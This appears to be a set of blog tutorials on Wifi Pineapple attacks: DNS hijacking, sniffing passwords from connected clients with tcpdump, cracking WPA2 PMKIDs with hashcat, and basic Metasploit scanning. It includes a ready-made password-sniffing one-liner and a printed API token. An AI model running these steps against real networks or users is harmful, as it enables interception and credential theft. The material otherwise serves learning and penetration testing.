DNS Hijacking with Wifi Pineapple

If you tried out modules like DNSspoof or DNSMasqSpoof on your Wifi Pineapple and had no success, then this tutorial will help you now. I will try my best to show you here a simple (and working) solution. The way differs to other tutorials on internet but should enable you to progress in your daily hacking work.

Objectives

In this example you will learn the basics about DNS Hijacking on Wifi Pineapple (without any additional modules).

Precondition

The ready configured internet share to Wifi Pineapple like in this tutorial, as well a 2nd device (or Virtual Machine) and a running FakeAP (where we later connect).

Step 1: prepare local PHP file and start PHP build-in server

To keep it simple, create the fake target site (incl. server) on your local device. This saves ressources on Wifi Pineapple device and will help more to understand this hole topic.

# create local project
$ mkdir -p ~/Projects/LandingPage

# change into project directory
$ cd ~/Projects/LandingPage

# create index.php file
$ vi ~/Projects/LandingPage/index.php

# start simple PHP server
$ php -S 0.0.0.0:80 index.php

# verify inside local browser (optional)
$ open http://172.16.42.42/

Content of very simple PHP file

<?php
header('Content-Type: text/html; charset=UTF-8');
echo 'hello spoofed DNS victim';

If you understand how all works, have a look on setoolkit.

Step 2: change hosts file and flush DNS

The DNS redirection (example.com to local running server) on the Wifi Pineapple is very easy. Just connect with SSH, modify the hosts file and flush the DNS cache.

# ssh into Wifi Pineapple
$ ssh -C4 root@172.16.42.1

# edit hosts file
$ vi /etc/hosts

# clear DNS cache
$ killall dnsmasq && /etc/init.d/dnsmasq start

# verify (optional)
$ nslookup example.com

# download website (optional)
$ wget example.com -O /tmp/index.html

# view file content (optional)
$ cat /tmp/index.html

The /etc/hosts file after modify it (2nd line).

127.0.0.1 localhost
172.16.42.42 example.com

::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

However, since there are strong restrictions with this type (for example wildcards are not possible), you should use the DNSMasq configuration “addn-hosts” later. But for now it’s fine.

Step 3: flush DNS and connect to Wifi

Now you can flush the DNS on your device or vm (STA) load the page (example.com). If everything works perfectly you should see now the following content in your browser.

Fake response:

Content for spoofed DNS

Real response:

Response for not spoofed DNS

Wifi Pineapple, tcpdump and Wireshark

Your Wifi Pineapple is up and running and some connected clients produce a lot of network traffic. What also means half of your MITM work is already done. 😉 Without any additional module you can already analys this traffic with tcpdump, which is installed by default. In combination with Wireshark (SSH Remote Capture) you can reach awesome goals.

Objectives

In this tutorial I will explain how easy you can obtain important network information via your MITM attack with tcpdump and/or Wireshark.

Step 1: some preparation first

Start the Wifi Pineapple, enable Internet sharing and verify your configurations. Without internet sharing your wifi clients don’t produce valuable traffic! In previous tutorials about Wifi Pineapple I wrote down two options how you can share internet on macOS (here and here you will find them).

Step 2: add an station (STA) to access point (AP)

For next step it’s needed to understand your network interfaces. On all Pineapple devices (Nano/Tetra) you have 2 WLAN interfaces -> wlan0 and wlan1 (inclusiv some other eq eth). Of course tcpdump would analyze the traffic for all interfaces but to be more precise and correct you should sniff packets on specific interface. So depended how an AP is created (open or FakeAP) and an STA is connected you need to decide on which interface you will work (wlan0 or wlan1mon).

For this example I will not create a fake AP (wlan1mon), I simply use the Open SSID (under menu item Networking). The SSID of my choise is Starbucks.

Open SSID configuration on Wifi Pineapple

As a STA I choose my own iPad (172.16.42.187).

iPad client on WiFi Pineapple

As I am mostly trust nothing, I can verify simply (ifconfig on Wifi Pineapple).

# get interface status (optional)
$ ssh -C4 root@172.16.42.1 "ifconfig"
wlan0     Link encap:Ethernet  HWaddr 00:13:37:A7:A3:3D  
          inet6 addr: fe80::213:37ff:fea7:a33d/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:334 errors:0 dropped:0 overruns:0 frame:0
          TX packets:479 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:36864 (36.0 KiB)  TX bytes:58796 (57.4 KiB)

wlan1     Link encap:Ethernet  HWaddr 00:13:37:A7:A3:3E  
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

Step 3: analys traffic with tcpdump

Our tcpdump examples will be executed directly on the Pineapple device, therefore please SSH into it.

# ssh into Pineapple
$ ssh -C4 root@172.16.42.1

The following tcpdump examples will help you to understand the basics. In case you need a deeper explanation about the commands use this free online service.

# show DNS traffic
$ tcpdump -i wlan0 -nn -l udp port 53

# show HTTP User Agent and Hosts
$ tcpdump -i wlan0 -nn -l -A -s1500 | egrep -i 'User-Agent:|Host:'

# show HTTP requests and Hosts
$ tcpdump -i wlan0 -nn -l -s 0 -v | egrep -i "POST /|GET /|Host:"

# show e-mail recipients
$ tcpdump -i wlan0 -nn -l port 25 | egrep -i 'MAIL FROM\|RCPT TO'

# show FTP data
$ tcpdump -i wlan0 -nn -v port ftp or ftp-data

# show all passwords different protocols
$ tcpdump -i wlan0 port http or port ftp or port smtp or port imap or port pop3 or port telnet -l -A | egrep -i -B5 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user '

Step 4: analys traffic with Wireshark

As disk space and hardware resources are not that high on Pineapple devices, why not use local Wireshark and analyze the traffic via remote?

In case you don’t have Wireshark already installed, now it will be the best time for it. Otherwise you can’t follow now this last part now.

To start tcpdump and Wireshark only a single one-liner is needed. Note: The Wireshark path I use in the example, is only for macOS!

# start tcpdump via SSH and Wireshark remote capture
$ ssh root@172.16.42.1 'tcpdump -i wlan0 -s0 -nn -w - not port 22' | /Applications/Wireshark.app/Contents/MacOS/Wireshark -k -i -

Here now some examples for Wireshark display filters.

Wireshark display filter for DNS

DNS queries and specific IP (STA)

(dns.flags.response == 0) && (ip.src == 172.16.42.187)

DNS responses and specific IP (STA)

(dns.flags.response == 1) && (ip.src == 172.16.42.187)

All HTTP requests

http.request

All HTTP responces and HTTP status code 200

(http.response) && (http.response.code == 200)

As you can see now, for such network analytics no additional Wifi Pineapple modules are required. What does not mean that I don’t like them.

Share internet from macOS to Wifi Pineapple (Part 2)

Some weeks ago I wrote the first part about Internet Sharing. There we changed the network configuration on the Wifi Pineapple itself. This time we tweak the network configuration (NAT subnet configurations) so that we can use internet sharing on macOS inside “172.16.42.x” network.

Objectives

Configure Internet Sharing without changing the default settings on Wifi Pineapple (but change defaults on macOS).

Step 1: Prepare for next steps

If you have “Internet Sharing” enabled, now you must switch it off!

Turn on the Wifi Pineapple device and connect via USB (A plug for NANO, ETH plug for TETRA) to your Mac. If everything works fine, following commands should run successful.

# ping device (optional)
$ ping -c 1 172.16.42.1

# show wifi pineapple network settings (optional)
$ ssh root@172.16.42.1 -C 'uci show network'

# start browser session (optional)
$ open http://172.16.42.1:1471

Step 2: Configure default subnet

The property list (com.apple.nat.plist) is like a contract between the “Sharing preferences pane” and “InternetSharing”. One important property to set there is “SharingNetworkNumberStart” (all other properties, which follow in this tutorial, are optional). This property controls the behavior of InternetSharing when it configures IP addresses for the local interfaces. I choose value 172.16.42.10.

# read the property list (optional)
$ defaults read /Library/Preferences/SystemConfiguration/com.apple.nat.plist

# create backup of the property list file (optional)
$ sudo cp /Library/Preferences/SystemConfiguration/com.apple.nat.plist /Library/Preferences/SystemConfiguration/com.apple.nat.plist.bak

# add start IP
$ sudo defaults write /Library/Preferences/SystemConfiguration/com.apple.nat NAT -dict-add SharingNetworkNumberStart 172.16.42.10

# add end IP (optional)
$ sudo defaults write /Library/Preferences/SystemConfiguration/com.apple.nat NAT -dict-add SharingNetworkNumberEnd 172.16.42.100

# add network mask (optional)
$ sudo defaults write /Library/Preferences/SystemConfiguration/com.apple.nat NAT -dict-add SharingNetworkMask 255.255.255.0

Step 3: Network configuration

We will deal with 2 interfaces locally (enX and bridge100). Now we configure the “enX” IP first. We do this simply via “Network preferences”. Depending to your Wifi Pineapple device you should see following services:

  • NANO: AX88x72A
  • TETRA: USB 10/100 LAN

Select the service and configure like in picture.

macOS - Wifi Pineapple IP configuration

Now change the network service order.

macOS - Wifi Pineapple network service order

After saving, we quickly check everything.

# check interface (in my case it's en5)
$ ifconfig en5                
...
inet 172.16.42.10 netmask 0xffffff00 broadcast 172.16.42.255

# ping from wifi pineapple (should not work yet)
$ ssh root@172.16.42.1 -C 'ping -c 1 google.com'
...
ping: sendto: Network unreachable

# check for interface (should not exist)
$ ifconfig bridge100
...
ifconfig: interface bridge100 does not exist

Step 4: Start Internet Sharing

Inside “System Preferences”, click “Sharing”, then select “Internet Sharing”. Configure as in picture.

macOS - Wifi Pineapple internet share

Step 5: Set bridge100 interface IP

Back to the terminal, here the interface “bridge100” should be visible now. This interface we assign the IP 172.16.42.42.

# show interface information (optional)
$ ifconfig bridge100

# add IP to bridge100 interface
$ sudo ifconfig bridge100 172.16.42.42 netmask 255.255.255.0 up

That’s it already! Via “Bulletins” you can verify.

Wifi Pineapple Dashboard

BTW … Take a look at the following local files, with and without Internet sharing!

# read config file for DHCP
$ defaults read /etc/bootpd.plist

# read internet share config (optional)
$ defaults read /System/Library/LaunchDaemons/com.apple.NetworkSharing.plist

Crack WPA2 with PMKID on macOS

With very little effort and a few tools, you can crack WPA2 WiFi passwords on your macOS. This tutorial will show you how to do it. Bettercap, hcxpcaptool (via Docker) and hashcat are used for this. Please note that these instructions are only used for learning purposes!

Precondition

Bettercap

To install Bettercap on macOS you need first to install libusb. Therefor download latest version of libusb and follow next steps (after unzip).

# change directory
$ cd ~/Downloads/libusb-1.0.23

# execute configure script
$ ./configure

# build the binary
$ make

# install binary
$ make install

# change directory & delete
$ cd ~ && rm -fr ~/Downloads/libusb-1.0.23

Now download Bettercap precompiled binary, extract the ZIP and follow the next steps.

# move binary
$ sudo mv ~/Downloads/bettercap_darwin_amd64_v2.27.1/bettercap /usr/local/bin

# change permissions
$ sudo chmod +x /usr/local/bin/bettercap

# running bettercap updates
$ sudo bettercap -eval "caplets.update; ui.update; q"

# start bettercap with UI caplet
$ sudo bettercap -caplet http-ui

Note: In this guide we don’t change the default credentials (user,pass). You can do on file “/usr/local/share/bettercap/caplets/http-ui.cap”!

Open the Browser (http://127.0.0.1:80), login and start Wifi discovery (wifi.recon on). Send some association requests to the selected BSSID (wifi.assoc BSSID). In your home folder you should find the file “bettercap-wifi-handshakes.pcap”.

Bettercap web UI associate with BSSID

Finish your Bettercap session when you are done.

Wireshark

Optional you can use Wireshark to verify, if you recorded the PMKID on Robust Secure Network (RSN). Start Wireshark, open the file “bettercap-wifi-handshakes.pcap”, add the filter “eapol && wlan.rsn.ie.pmkid” and search the PMKID(s).

Wireshark RSN PMKID

hcxpcaptool

Now you need to convert (extract) the PMKID(s) from the Bettercap pcap file. For this you need the “hcxdumptool” from ZeraBea. Because OpenSSL is needed (and I don’t want to install it), I created a small Alpine Docker image (Dockerfile). You can follow next steps for usage.

# pull the image
$ docker pull slorenz/hcxpcaptool

# create directories
$ mkdir -p ~/Projects/PMKID/cap

# change directory
$ cd ~/Projects/PMKID/

# copy pcap into cap directory
$ cp ~/bettercap-wifi-handshakes.pcap ~/Projects/PMKID/cap/

# run container
$ docker run -ti --rm --mount src="$(pwd)/cap",target=/hcxpcaptool,type=bind slorenz/hcxpcaptool bettercap-wifi-handshakes.pcap

# show content (optional)
$ cat cap/pmkid.16800

Note: The columns (of pmkid.16800 content) are divided by * into following:

  • PMKID
  • MAC AP
  • MAC Station
  • ESSID

If you have not four columns, you need to repeat all previous steps for recording and convert!

hashcat

That was actually the easy part. Now we use Hashcat to crack the WPA2 passwords. The “only” challenge is the password length and the characters used. The next steps will guide you:

# create directory
$ mkdir -p ~/Projects

# change directory
$ cd ~/Projects

# clone git repository of hashcat
$ git clone https://github.com/hashcat/hashcat.git

# build binary
$ make -C hashcat/

# install binary
$ sudo make install -C hashcat/

# delete cloned repository (optional)
$ rm -fr ~/Projects/hashcat

# show hashcat help (optional)
$ hashcat -h

# run benchmark (optional)
$ hashcat -b

# execute hashcat
$ hashcat -m 16800 pmkid.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

That’s it … have fun and success!

Introduction into Wifi Pineapple API

After short time you might come to the idea to control your Wifi Pineapple via terminal only. Luckily the developers provided an API. There is already a Python wrapper available. But why not easily using curl and jq?

Objective

Learn how to setup and use (via curl) the Wifi Pineapple API.

Precondition

jq installed (latest)

Preparation

If not done already, you need to create a API token. To do so, open “Advanced” section – insert a token name and press button “Generate”.

Wifi Pineapple generate API token

The curl commands can be very long and unhandy. To make it a little easier to use, you should save and use the very long token (and header) as a variables ($TOKEN and $HEADER).

# create token variable
$ TOKEN="458aef505b17d0e954f95419c8da0df1047529708787bb04b15362bc3ecaa6e19e22d8bf2378293275c0e9ce6af62ef0e00691ec24aaa7309e6b9923067177af"

$ HEADER='-H "Content-type: application/json"'

# create a first simple nothification
$ curl -s -X POST  $HEADER -d '{"system": "notifications", "action": "addNotification", "message": "my first notification", "apiToken": "'$TOKEN'"}' http://192.168.2.10:1471/api/

As the Wifi Pineapple use an well known prefix we cannot use jq directly! So we need to remove the prefix from our output. Now create a new variable and pipe the output through sed. In my case the following characters are used as response prefix “)]}’,“.

# create prefix variable
$ PREF=")]}',"

# create a second simple nothification (incl. sed and jq)
$ curl -s -X POST  $HEADER -d '{"system": "notifications", "action": "addNotification", "message": "my second notification", "apiToken": "'$TOKEN'"}' http://192.168.2.10:1471/api/ | sed -e "s/^$PREF//" | jq .

If everything was working well, the terminal output will be pretty-printed (via jq) and you should be able to see both notifications (Browser UI).

Wifi Pineapple notifications via API

API examples

The online API documentation is very good described. However, to give you a better start, a few examples are shown below.

# get current version of Wifi Pineapple
$ curl -s -X POST $HEADER -d '{"module": "Advanced", "action": "getCurrentVersion", "apiToken": "'$TOKEN'"}' http://192.168.2.10:1471/api/ | sed -e "s/^$PREF//" | jq .

# get current time zone of Pineapple
$ curl -s -X POST $HEADER -d '{"module": "Configuration", "action": "getCurrentTimeZone", "apiToken": "'$TOKEN'"}' http://192.168.2.10:1471/api/ | sed -e "s/^$PREF//" | jq .

# check available module storages
$ curl -s -X POST $HEADER -d '{"module": "ModuleManager", "action": "checkDestination", "apiToken": "'$TOKEN'"}' http://192.168.2.10:1471/api/ | sed -e "s/^$PREF//" | jq .

# get installed modules
$ curl -s -X POST $HEADER -d '{"module": "ModuleManager", "action": "getInstalledModules", "apiToken": "'$TOKEN'"}' http://192.168.2.10:1471/api/ | sed -e "s/^$PREF//" | jq .

I think you’ve got it. In similar way you can use the API for “Recon”, “Logging”, “Networking” and so on.

Understand and measure signal strength with Wifi Pineapple

It’s a long title for a tutorial this time. Don’t worry I will try my best to make it short and understandable. Many people wonder why there penetration of Wifi networks not really works and forget about an very important point: “Wifi Signal Strength”. But what is it? How can I measure it? Do I need to buy expensive software? Here a try to enlighten you. For this explanation I will use the Wifi Pineapple device with some command line tools and a nice UI module.

Objectiv

Understand the basics of Wifi Signal Strength and learn how to measure it.

Precondition

Wifi Pineapple device incl. SSH connection into it plus internet connection (to download the module).

The basics

The WiFi signal strength is given as the logarithmic (not linear) unit of measurement of the power dBm. Decibels are relative to milliwatts and are expressed as a negative number from 0 to -100. For example, a signal value of -50 is much stronger than a signal value of -70. A difference of 3 dBm is therefore halving or doubling the strength of the previous value. The following table should give some information about the values.

Signal strengthQualityDescription
-30 dBmExcellentOne of the best values ​​that can be achieved.
-50 dBmGoodAn very good signal level which allows all applications in the network.
-70 dBmAcceptableNot a good value, there are already severe application problems.
-90 dBmVery badVery bad value, there is usually no connection here.

The measurement

Now let’s get to the measurement quickly. Start the Wifi Pineapple and connect.

# SSH into Wifi Pineapple device
$ ssh root@192.168.2.10

Let’s take a look at the values ​​of the wifi devices themselves (these will be different).

# show statistics on each wireless interface in the system
$ cat /proc/net/wireless

# show interface configuration with ifconfig
$ ifconfig wlan0
$ ifconfig wlan1

# show interface configuration with iwconfig
$ iwconfig wlan0
$ iwconfig wlan1

Now we scan the Wifi’s and have the values ​​displayed (repeat this multiple times to get the average).

# use iwlist to scan (old way)
$ iwlist wlan0 scanning | egrep -i 'SSID|Quality'

# use iw to scan (modern way)
$ iw wlan0 scan | egrep -i 'SSID|signal'

Make it more visible

Under the Wifi Pineapple modules you can search for “SignalStrength” and install it. After successful installation, select the module then select one of your available wifi interfaces and press button “Scan”.

Wifi Pineapple module SignalStrength scan

After short time you will have outputs as table and graph.

Signal Level Graph

That’s it already. With these basics, you should be able to understand and perform your wifi penetration tests even better.

Wifi Pineapple Module DWall

This is the first tutorial about Wifi Pineapple modules. I will start with a simple one called DWall. With this module you can gather and display easily live informations from connected clients wich using the HTTP protocol.

Objective

Installation and usage of module DWall on the Wifi Pineapple.

Precondition

Your Wifi Pineapple need to have an internet connection.

Installation

This time we will use the browser UI for the installation. Let’s start… Look for DWall among the available modules, click the “Install” button and select the location (you should always select the SD card, if available).

DWall installation on Wifi Pineapple

Via Terminal you can verify the installation, too.

# list installed modules on sdcard folder
$ ssh root@192.168.2.10 -C 'ls -la /sd/modules/'

Usage

After successful installation (which should be quite fast), select the module. Now activate it and start the listener. As soon as a connected client makes requests with HTTP, you will see them in the module output. Depending on the responce, also other data such as pictures.

DWall report on Wifi Pineapple UI

Now the last one should also understand why encryption (HTTPS) is so important! Even if it is already used a lot, you will figure that many websites still work without encryption.

Getting started with Metasploit

Many tutorials about Metasploit are available on internet (as well many books and trainings), but most of them confusing beginners. My intention with the following content is to create a simple environment (via Docker) and to show the use of this. In order not to make it too boring, I also show some important basics for Metasploit itself.

Objective

Learn how to create and use a simple training environment as well as learn first basic metasploit commands.

Precondition

Docker (latest) installed

Prepare environment

As mentioned already we will use Docker. The benefits here are this does not need installations and no local installed Anti-virus tool does disturb and complain.

# create working directory and change location
$ mkdir -p ~/Projects/Metasploit/msf && cd ~/Projects/Metasploit

# list directories/files (optional)
$ tree .
|__msf

# create network
$ docker network create --subnet=172.18.0.0/16 metasploit

# check created network (optional)
$ docker network ls --filter driver=bridge --no-trunc

# run postgres container
$ docker run -d --name postgres --ip 172.18.0.2 --network metasploit -e POSTGRES_PASSWORD=postgres -e POSTGRES_USER=postgres -e POSTGRES_DB=msf -v "$(pwd)/msf/database:/var/lib/postgresql/data" postgres:11-alpine

# show logs (optional)
$ docker logs postgres

# run metasploit container
$ docker run --name metasploit --ip 172.18.0.3 --network metasploit -it -v "$(pwd)/msf/user:/home/msf/.msf4" -p 8443-8500:8443-8500 metasploitframework/metasploit-framework ./msfconsole

# list latest created containers (optional in different tty)
$ docker ps -n 2

Connect database

In this environment we need to connect the Postgres database manually.

# check database status (optional)
msf5 > db_status

# connect (if broken)
msf5 > db_connect postgres:postgres@172.18.0.2:5432/msf

Prepare Metasploit workspace

This is an very important step! It gets often forgotten in other tutorials. Without this steps you will have later many problems/confusions and may don’t understand why.

# list all workspaces
msf5 > workspace

# create new workspace
msf5 > workspace -a hackthissite.org

# list all hosts (optional)
msf5 > hosts

# list all services (optional)
msf5 > services

Some scanner actions

As promised here some other basics.

# search for scanner with name:tcp
msf5 > search auxiliary name:tcp

# select tcp portscanner module
msf5 > use auxiliary/scanner/portscan/tcp

# show detailed information (optional)
msf5 auxiliary(scanner/portscan/tcp) > info

# show options
msf5 auxiliary(scanner/portscan/tcp) > options

# set needed values
msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS hackthissite.org
msf5 auxiliary(scanner/portscan/tcp) > set PORTS 20-100
msf5 auxiliary(scanner/portscan/tcp) > set THREADS 6

# execute scan
msf5 auxiliary(scanner/portscan/tcp) > run

# move out of the current context
msf5 auxiliary(scanner/portscan/tcp) > back

# list all hosts
msf5 > hosts

# list all services
msf5 > services

Stop and restart the environment

# stop metasploit container
msf5 > exit

# stop postgres container
$ docker stop postgres

# check container status (optional)
$ docker ps -a
# change directory (if not done already)
$ cd ~/Projects/Metasploit

# start postgres container (first)
$ docker start postgres

# start metasploit container
$ docker start metasploit

# run msfconsole (without banner)
$ docker exec -ti metasploit ./msfconsole -q

# connect to postgres (if broken)
msf5 > db_connect postgres:postgres@172.18.0.2:5432/msf
Connected to Postgres data service: 172.18.0.2/msf

# list workspaces
msf5 > workspace
  hackthissite.org
* default

# select specific workspace
msf5 > workspace 'hackthissite.org'
[*] Workspace: hackthissite.org

Now you have everything you need for the next tutorials.